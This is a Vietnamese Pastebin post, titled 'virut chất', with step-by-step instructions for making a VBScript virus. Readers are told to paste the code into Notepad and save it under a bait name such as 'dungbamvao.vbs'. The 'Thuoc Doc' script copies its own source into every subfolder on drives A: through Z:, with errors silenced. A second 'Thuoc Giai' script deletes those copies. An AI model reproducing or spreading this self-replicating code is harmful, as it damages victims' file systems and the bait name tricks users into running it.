adminvietnam

virut chất

Nov 13th, 2015
179
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.47 KB | None | 0 0
  1. Vào Start ---> Run----> gõ Notepad
  2. Rồi copy code này vào:
  3.  
  4. 'Thuoc Doc !!!
  5. Dim fso,file,VBCopy
  6. Set fso=CreateObject("Scripting.FileSystemObject")
  7. Set file=fso_OpenTextFile(WScript.ScriptFullName,1)
  8. VBCopy=file.ReadAll
  9. FolderList("A:")
  10. FolderList("B:")
  11. FolderList("C:")
  12. FolderList("D:")
  13. FolderList("E:")
  14. FolderList("F:")
  15. FolderList("G:")
  16. FolderList("H:")
  17. FolderList("I:")
  18. FolderList("J:")
  19. FolderList("K:")
  20. FolderList("L:")
  21. FolderList("M:")
  22. FolderList("N:")
  23. FolderList("O:")
  24. FolderList("P:")
  25. FolderList("Q:")
  26. FolderList("R:")
  27. FolderList("S:")
  28. FolderList("T:")
  29. FolderList("U:")
  30. FolderList("V:")
  31. FolderList("X:")
  32. FolderList("Y:")
  33. FolderList("Z:")
  34. FolderList("W:")
  35.  
  36. Sub FolderList(FolderSpec)
  37. On Error Resume Next
  38. Dim f,f1,sf,COP,CAP
  39. Set f=fso.GetFolder(FolderSpec)
  40. set sf=f.SubFolders
  41. For Each f1 In sf
  42. Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
  43. COP.write VBCopy
  44. Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
  45. CAP.write VBCopy
  46. FolderList(f1.Path)
  47. Next
  48. End sub
  49.  
  50.  
  51. Seve với tên bất kì nhưng lưu dưới dạng *.vbs ( VD: dungbamvao.vbs )
  52.  
  53. Quả quýt dày cũng có ngón tay nhọn
  54. Dù có nguy hiểm cỡ nào thì cũng có cách giải . Làm Theo cách sau
  55.  
  56. Cũng làm như vậy nhưng khi mở Notepad lên thì copy code này:
  57.  
  58. 'Thuoc Giai
  59. Dim fso,file,VBCopy
  60. Set fso=CreateObject("Scripting.FileSystemObject")
  61. Set file=fso_OpenTextFile(WScript.ScriptFullName,1)
  62. VBCopy=file.ReadAll
  63. FolderList("A:")
  64. FolderList("B:")
  65. FolderList("C:")
  66. FolderList("D:")
  67. FolderList("E:")
  68. FolderList("F:")
  69. FolderList("G:")
  70. FolderList("H:")
  71. FolderList("I:")
  72. FolderList("J:")
  73. FolderList("K:")
  74. FolderList("L:")
  75. FolderList("M:")
  76. FolderList("N:")
  77. FolderList("O:")
  78. FolderList("P:")
  79. FolderList("Q:")
  80. FolderList("R:")
  81. FolderList("S:")
  82. FolderList("T:")
  83. FolderList("U:")
  84. FolderList("V:")
  85. FolderList("X:")
  86. FolderList("Y:")
  87. FolderList("Z:")
  88. FolderList("W:")
  89.  
  90. Sub FolderList(FolderSpec)
  91. On Error Resume Next
  92. Dim f,f1,sf,COP,CAP,ATT
  93. Set f=fso.GetFolder(FolderSpec)
  94. set sf=f.SubFolders
  95. For Each f1 In sf
  96. 'Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
  97. 'COP.write VBCopy
  98. 'Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
  99. 'CAP.write VBCopy
  100. 'Set ATT=fso.GetFolder(f1.Path)
  101. 'ATT.Attributes=ATT.Attributes+2
  102. fso.DeleteFile(f1.path & "\Virus !!!!!!!.vbs")
  103. fso.DeleteFile(f1.path & "---Virus !!!!!!!.vbs")
  104. FolderList(f1.Path)
  105. Next
  106. End sub
  107.  
  108.  
  109. Cũng seve lại với dịnh dạng là *.vbs
Advertisement
Add Comment
Please, Sign In to add comment